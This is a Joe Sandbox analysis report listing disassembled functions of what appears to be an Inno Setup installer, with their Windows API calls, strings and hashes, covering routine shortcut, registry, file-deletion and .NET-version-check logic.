                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269503290-0
                                                                                                                                                                                                                                  • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                                                                                                                                                  • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00456638 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 310COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • 756FE550.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                                                                                                                                                  • 756FE550.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                                                                                                                                                  • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                                                                                                                                                  • IPersistFile::Save, xrefs: 00456962
                                                                                                                                                                                                                                  • {pf32}\, xrefs: 0045671E
                                                                                                                                                                                                                                  • CoCreateInstance, xrefs: 004566AF
                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                                                                                                                                                  • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                                                                                                                                                  • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: E550$FreeString
                                                                                                                                                                                                                                  • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                                                                                                                                                  • API String ID: 491012016-2363233914
                                                                                                                                                                                                                                  • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                                                                                                                                                  • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004983D0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                                                                                                                                                    • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                                                                                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                                                                                                                                                  • API String ID: 2000705611-3672972446
                                                                                                                                                                                                                                  • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                                                                                                                                                  • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045A6D8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                                                                                                                  • API String ID: 1452528299-3112430753
                                                                                                                                                                                                                                  • Opcode ID: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
                                                                                                                                                                                                                                  • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b969254c7af52069d00d450bc25108601270d2f9398ad690918fa25cf6f4b58e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045CBC0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                                                                                                                                                    • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                                                                                                                                  • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                                                                                                                                  • API String ID: 59345061-4263478283
                                                                                                                                                                                                                                  • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                                                                                                                                                  • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B3AC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                                                                                                                                                  • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0041B402
                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 644427674-0
                                                                                                                                                                                                                                  • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                                                                                                                                                  • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00472B48 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                                                                                                                                  • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                                                                                                                                  • API String ID: 971782779-3668018701
                                                                                                                                                                                                                                  • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                                                                                                                                                  • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00454874 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                                                                                                                                                    • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RegOpenKeyEx, xrefs: 00454910
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                                                                                                                                                  • , xrefs: 004548FE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                                                                                                                                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                  • API String ID: 2812809588-1577016196
                                                                                                                                                                                                                                  • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                                                                                                                                  • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00459458 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                                                                                                                                                  • v4.0.30319, xrefs: 004594F1
                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                                                                                                                                                  • .NET Framework version %s not found, xrefs: 00459609
                                                                                                                                                                                                                                  • v1.1.4322, xrefs: 004595C2
                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                                                                                                                                                  • v2.0.50727, xrefs: 0045955B
                                                                                                                                                                                                                                  • .NET Framework not found, xrefs: 0045961D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Open
                                                                                                                                                                                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                                                                                                  • API String ID: 2976201327-446240816
                                                                                                                                                                                                                                  • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                                                                                                                                  • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00458A44 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                                                                                                                                                  Strings
